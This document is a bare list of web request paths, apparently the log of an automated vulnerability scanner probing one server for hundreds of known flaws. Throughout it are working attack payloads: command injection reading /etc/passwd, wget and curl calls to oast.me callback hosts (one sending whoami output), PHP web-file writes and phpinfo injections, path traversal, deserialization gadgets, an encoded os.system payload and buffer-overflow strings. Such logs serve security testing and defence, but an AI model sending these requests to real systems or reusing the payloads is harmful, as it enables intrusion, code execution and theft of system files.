/web/ReportServer/Pages/ReportViewer.aspx
/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/web/node/1?_format=hal_json
/web/run
/web/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/web/index.php?s=/home/page/uploadImg
/web/guest_auth/guestIsUp.php
/web/password_change.cgi
/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
/web/index.php?s=captcha
/web/dashboard/uploadID.php
/web/(download)/tmp/poc.txt
/web
/web/tests/support/stores/test_grid_filter.php?query=phpinfo();
/web/servlet/UploadServlet
/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
/web/service/extdirect
/web/
/web/ucmdb-api/connect
/web/test.txt
/web/solr/admin/cores?wt=json
/web/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png
/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D
/web/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/secure/ContactAdministrators!default.jspa
/web/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg
/web/objects/nuclei.txt
/web/login/
/web/run
/web/ReportServer/Pages/ReportViewer.aspx
/web/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/web/node/1?_format=hal_json
/web/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData
/web/guest_auth/guestIsUp.php
/web/index.php?s=/home/page/uploadImg
/web/dashboard/uploadID.php
/web/index.php?s=captcha
/web/(download)/tmp/poc.txt
/web/service/extdirect
/web
/web/portal/info.jsp
/web/php/ping.php
/web/boardDataWW.php
/web/wls-wsat/CoordinatorPortType
/web/card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60
/web/ucmdb-api/connect
/web/solr/admin/cores?wt=json
/web/secure/ContactAdministrators!default.jspa
/web/login/
/web/actions/authenticate.php
/web/goform/setmac
/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnEkT2P49VWtBjX7t0PRxInp7.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
/web/pages/systemcall.php?command=cat%20/etc/passwd
/web/_ignition/execute-solution
/web/website/blog/
/web/_search?pretty
/web/lib/crud/userprocess.php
/web/cgi-bin/slogin/login.py
/web/
/web/nuclei.txt
/web
/web/
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/web/cobbler_api
/web/./RestAPI/LogonCustomization
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/webtools/control/SOAPService
/web/rest/tinymce/1/macro/preview
/web/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
/web/_ignition/execute-solution
/web/directdata/direct/router
/web/pages/createpage-entervariables.action?SpaceKey=x
/web/
/web/users/sign_in
/web/index.jsp
/web/checkValid
/web/?p=1
/web/index.php?plot=;wget%20http://c8ach799m8v918fkv9igcekcteyyyyyy1.oast.me
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/_ignition/execute-solution
/web/
/web/wls-wsat/CoordinatorPortType
/web/pages/createpage-entervariables.action
/web/poc.txt
/web/
/web/api/experimental/test
/web/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
/web/
/web/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt
/web/actions/authenticate.php
/web/index.php?a=fetch&content=%3C%3Fphp+file_put_contents%28%2225SnEkT2P49VWtBjX7t0PRxInp7.php%22%2C%22%3C%3Fphp+echo+phpinfo%28%29%3B%22%29%3B
/web/goform/setmac
/web/pages/systemcall.php?command=cat%20/etc/passwd
/web/website/blog/
/web/api/experimental/dags/example_trigger_target_dag/paused/false
/web/lib/crud/userprocess.php
/web/webadmin/out
/web/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
/web/ui/vropspluginui/rest/services/getstatus
/web/password.cgi
/web/25SnEkT2P49VWtBjX7t0PRxInp7.php
/web/struts2-rest-showcase/orders/3
/web/seeyon/thirdpartyController.do.css/..;/ajax.do
/web/_search
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/./RestAPI/LogonCustomization
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc8ach799m8v918fkv9igcekcteeyyyyy6.oast.me%60
/web/v1/agent/service/register
/web/openam/oauth2/..;/ccversion/Version
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/index.jsp
/web/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/web/qvisdvr/
/web/users/sign_in
/web/index.php?plot=;wget%20http://c8ach799m8v918fkv9igcekcteyyyyyy1.oast.me
/web/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Fc8ach799m8v918fkv9igcekcteoyyyybn.oast.me%60
/web/./RestAPI/LogonCustomization
/web/search.php?searchtype=5
/web/checkValid
/web/orders/3
/web/index.php
/web/s=set&_method=__construct&method=*&filter[]=system
/web/_ignition/execute-solution
/web/meta
/web/pages/createpage-entervariables.action
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/web/_ignition/execute-solution
/web/wsman
/web/clients/editclient.php?id=25SnEhNV0Evo0QU7TqpJMOkhDlo&action=update
/web/public/css/25SnEblNTyjWbu2Y5zCB5bmySnC.css
/web/poc.txt
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/wls-wsat/CoordinatorPortType
/web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/_ignition/execute-solution
/web/wp-content/plugins/contact-form-7/readme.txt
/web/login.action
/web/sitecore/shell/ClientBin/Reporting/Report.ashx
/web/cgi-bin/mt/mt-xmlrpc.cgi
/web/invoker/EJBInvokerServlet/
/web/include/nuclei.txt
/web/wp-admin/admin-ajax.php?action=action_name
/web/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/webmail/basic/
/web/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/api/experimental/dags/example_trigger_target_dag/paused/false
/web/25SnEkT2P49VWtBjX7t0PRxInp7.php
/web/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/api/experimental/dags/example_trigger_target_dag/dag_runs
/web/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/web/admin/elfinder/elfinder-cke.html
/web/websso/SAML2/SSO/vsphere.local?SAMLRequest=
/web/_async/AsyncResponseService
/web/v1/agent/service/register
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybk.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybc.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/cgi-bin/file_transfer.cgi
/web/v2/query
/web/assets/backend/elfinder/elfinder-cke.html
/web/index.php
/web/search.php?searchtype=5
/web/./RestAPI/LogonCustomization
/web/s=set&_method=__construct&method=*&filter[]=system
/web/lcms/index.php
/web/orders/3
/web/reports/rwservlet/showenv
/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/web/./RestAPI/Connection
/web/lui/
/web/debug.php
/web/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
/web/meta
/web?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/web/
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/mifs/j_spring_security_check
/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/web/wsman
/web/clients/editclient.php?id=25SnEhNV0Evo0QU7TqpJMOkhDlo&action=update
/web/
/web/logos_clients/1.php
/web/
/web/search/
/web/cgi-bin/status
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/wp-content/plugins/contact-form-7/readme.txt
/web/lucee/admin/imgProcess.cfm?file=/whatever
/web/script/
/web?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/web/cgi-bin/login?LD_DEBUG=files
/web/_ignition/execute-solution
/web/cgi-bin/mt/mt-xmlrpc.cgi
/web/login.action
/web/_ignition/execute-solution
/web/invoker/EJBInvokerServlet/
/web/wp-admin/admin-ajax.php?action=action_name
/web/cf_scripts/scripts/ajax/package/cfajax.js
/web/webmail/basic/
/web/confluence/pages/createpage-entervariables.action
/web/SDK/webLanguage
/web/owa/auth/x.js
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/scripts/setup.php
/web/command.cgi?cat%20/etc/passwd
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybk.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekcteayyyybc.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekctjyyyyyb4.oast.me%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bwget,http://c8ach799m8v918fkv9igcekctjyyyyybh.oast.me%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/web/assets/backend/elfinder/elfinder-cke.html
/web/wls-wsat/RegistrationRequesterPortType
/web/assets/elFinder-2.1.9/elfinder.html
/web/lcms/index.php
/web/reports/rwservlet/showenv
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
/web/./RestAPI/Connection
/web/webtools/control/main
/web/lui/
/web/ajax/networking/get_netcfg.php?iface=;curl%20http://c8ach799m8v918fkv9igcekctjyyyyynn.oast.me/`whoami`;
/web/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/assets/elFinder/elfinder.html
/web/help/admin-guide/test.jsp
/web/cgi-bin/status
/web/stat.jsp?cmd=chcp+437+%7c+dir
/web/?author=1
/web/hub/
/web/cgi?2
/web/upload
/web/backend/elfinder/elfinder-cke.html
/web/lucee/admin/imgProcess.cfm?file=/whatever
/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/web/script/
/web/boafrm/formSysCmd
/web/search.php?search=%22;wget+http%3A%2F%2Fc8ach799m8v918fkv9igcekctjyyyyynk.oast.me%27;%22
/web/SDK/webLanguage
/web/_ignition/execute-solution
/web/v1/backend1
/web/lucee/admin/imgProcess.cfm?file=/../../../context/25SnEo7EsotKg5Bp2pgjAYs9yNG.cfm
/web/cf_scripts/scripts/ajax/package/cfajax.js
/web/cgi-bin/weblogin.cgi?username=admin';cat
/web/mgmt/shared/authn/login
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/
/web/confluence/pages/createpage-entervariables.action
/web/owa/auth/x.js
/web/wiki/pages/createpage-entervariables.action?SpaceKey=x
/web/
/web/cf-scripts/scripts/ajax/package/cfajax.js
/web/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/web/mgmt/tm/util/bash
/web/x
/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1
/web/lucee/25SnEo7EsotKg5Bp2pgjAYs9yNG.cfm
/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/web/system/sharedir.php
/web/cgi-bin/login.cgi
/web/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/web/poc.txt
/web/
/web/wiki/pages/createpage-entervariables.action
/web/
/web/webtools/control/main
/web/CFIDE/scripts/ajax/package/cfajax.js
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/page/exportImport/uploadOperation.jsp
/web/account
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/
/web/upload/UploadResourcePic.ashx?ResourceID=8382
/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8ach799m8v918fkv9igcekctjeyyyyna.oast.me)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
/web/backend/elfinder/elfinder-cke.html
/web/cgi?2
/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/web/search.php?search=%22;wget+http%3A%2F%2Fc8ach799m8v918fkv9igcekctjyyyyynk.oast.me%27;%22
/web/upload
/web/v1/backend1
/web/cgi-bin/jarrewrite.sh
/web/
/web/boafrm/formSysCmd
/web/account
/web/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
/web/lucee/25SnEo7EsotKg5Bp2pgjAYs9yNG.cfm
/web/wiki/pages/createpage-entervariables.action
/web/system/sharedir.php
/web/assets/php/upload.php
/web/elfinder/elfinder-cke.html
/web/jolokia/read/getDiagnosticOptions
/web/mgmt/tm/util/bash
/web/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/web/actuator/env
/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/web/pages/doenterpagevariables.action
/web/
/web/cgi?7
/web/CFIDE/scripts/ajax/package/cfajax.js
/web/en/php/usb_sync.php
/web/page/exportImport/fileTransfer/poc.jsp
/web/RPC2
/web/integration/saveGangster.action
/web/cfide/scripts/ajax/package/cfajax.js
/web/webadm/?q=moni_detail.do&action=gragh
/web/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=25SnEcrXAtgzl4ap2WMFzCZU5Nf.php&target=l1_Lw
/web//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c8ach799m8v918fkv9igcekctjeyyyyna.oast.me)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
/web/graph_realtime.php?action=init
/web/
/web/api/timelion/run
/web/boaform/admin/formTracert
/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/web/api/user/reg
/web/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1
/web/v1/25SnEheiBnTSLo3RyxVmlA2Sane.php
/web/login.htm
/web/cgi-bin/mainfunction.cgi
/web/infusions/downloads/downloads.php?cat_id=${system(ls)}
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/cgi/networkDiag.cgi
/web/solr/admin/cores?wt=json
/web/api/jsonws/invoke
/web/context.json
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/web/elfinder/elfinder-cke.html
/web/assets/php/upload.php
/web/assets/data/usrimg/25snegguasdxxncpzqo9ayydhc1.php
/web/uploads/assets/backend/elfinder/elfinder-cke.html
/web/__
/web/uploads/assets/backend/elfinder/elfinder.html
/web/ws_utc/resources/setting/options
/web/actuator/env
/web/uploads/elfinder/elfinder-cke.html
/web/
/web/pages/doenterpagevariables.action
/web/cgi?7
/web/
/web/RPC2
/web/pages/createpage.action?spaceKey=myproj
/web/cfide/scripts/ajax/package/cfajax.js
/web/?action=command&command=set_city_timezone&value=$(wget%20http://c8ach799m8v918fkv9igcekctkyyyyygn.oast.me))
/web/apply_sec.cgi
/web/user.action
/web/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==
/web/CF_SFSD/scripts/ajax/package/cfajax.js
/web/tools.cgi
/web/graph_realtime.php?action=init
/web/var
/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/web/api/timelion/run
/web/?id=nuclei%25{128*128}
/web/boaform/admin/formTracert
/web/cfide-scripts/ajax/package/cfajax.js
/web/wp-content/plugins/wsecure/wsecure-config.php
/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/web/wp-json/buddypress/v1/signup
/web/api/user/reg
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/cgi-bin/mainfunction.cgi
/web/login.htm
/web/mailingupgrade.php
/web/api/group/list
/web
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/infusions/downloads/downloads.php?cat_id=${system(ls)}
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/cgi-bin/system_mgr.cgi?
/web/
/web/api/jsonws/invoke
/web/cgi-bin/status
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/web/cgi/networkDiag.cgi
/web/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget
/web/api/jsonws/invoke
/web/console/login/LoginForm.jsp
/web/solr/admin/cores?wt=json
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
/web/apisix/admin/routes
/web/cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd
/web/api/login
/web/druid/indexer/v1/sampler
/web/cgi-bin/stats
/web/
/web/ws_utc/resources/setting/options
/web/login
/web/login.php
/web/uploads/elfinder/elfinder-cke.html
/web/version.web
/web/EemAdminService/EemAdmin
/web/fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27
/web/ws_utc/resources/setting/keystore
/web/pages/createpage.action?spaceKey=myproj
/web/plugin/add
/web/apply_sec.cgi
/web/pages/templates2/viewpagetemplate.action
/web/tools.cgi
/web/apply_sec.cgi
/web/plugin/customMethod
/web/wp-content/plugins/wsecure/wsecure-config.php
/web/cfide-scripts/ajax/package/cfajax.js
/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}
/web/jars/upload
/web/wp-json/buddypress/v1/signup
/web/var
/web/ws/v1/cluster/apps/new-application
/web/
/web/tools.cgi
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
/web/mailingupgrade.php
/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/web/cfmx/CFIDE/scripts/ajax/package/cfajax.js
/web/wp-admin/admin-ajax.php
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25SnEgaRzmhDNUNeO7b692mCj6W.jsp
/web/mifs/.;/services/LogService
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/api/jsonws/invoke
/web/apisix/admin/routes
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
/web/25SnEcWqu2D9ZvV5C4BzTD0Nful?cmd=id
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
/web/cgi-bin/login.cgi
/web/install/install.php?step=4
/web/api/login
/web/cgi-bin/stats
/web/?s=index/index/index
/web/install/includes/configure.php
/web/version.web
/web/EemAdminService/EemAdmin
/web/cgi-bin/test
/web/goform/setSysAdm
/web/login.php
/web/users/sign_in
/web/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users
/web/storfs-asup
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/Upload/upload_file.php?l=test
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/index.php
/web/servlet/~ic/bsh.servlet.BshServlet
/web/servlet/~ic/bsh.servlet.BshServlet
/web/pages/templates2/viewpagetemplate.action
/web/jars/upload
/web/apply_sec.cgi
/web/apply_sec.cgi
/web/pages/createpage-entervariables.action
/web/tools.cgi
/web/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E
/web/wp-admin/admin-ajax.php
/web/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/25SnEgaRzmhDNUNeO7b692mCj6W.jsp
/web/wp-content/uploads/workreap-temp/25SnEaad1vBVjS7bRv3FVGuwlY1.php
/web/25SnEcWqu2D9ZvV5C4BzTD0Nful?cmd=id
/web/cgi-bin/login.cgi
/web/cgi-bin/test
/web/goform/setSysAdm
/web/cgi-bin/status/status.cgi
/web/users/sign_in
/web/Upload/upload_file.php?l=test
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/Upload/test/test.php
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/_fragment?_path=_controller=phpcredits&flag=-1
/web/servlet/~ic/bsh.servlet.BshServlet
/web/pages/createpage-entervariables.action
/web/template/custom/content-editor
/web/wp-content/uploads/workreap-temp/25SnEaad1vBVjS7bRv3FVGuwlY1.php
/web/cgi-bin/status/status.cgi
/web/Upload/test/test.php
/web/imc/javax.faces.resource/dynamiccontent.properties.xhtml
/web/test.cgi
/web/template/custom/content-editor
/web/templates/editor-preload-container
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/test.cgi
/web/tmui/locallb/workspace/fileSave.jsp
/web/debug.cgi
/web/templates/editor-preload-container
/web/cgi-bin/test-cgi
/web/users/user-dark-features
/web/tmui/locallb/workspace/fileSave.jsp
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/cgi-bin/test-cgi
/web/users/user-dark-features
/web/tmui/locallb/workspace/tmshCmd.jsp
/web/tmui/locallb/workspace/tmshCmd.jsp
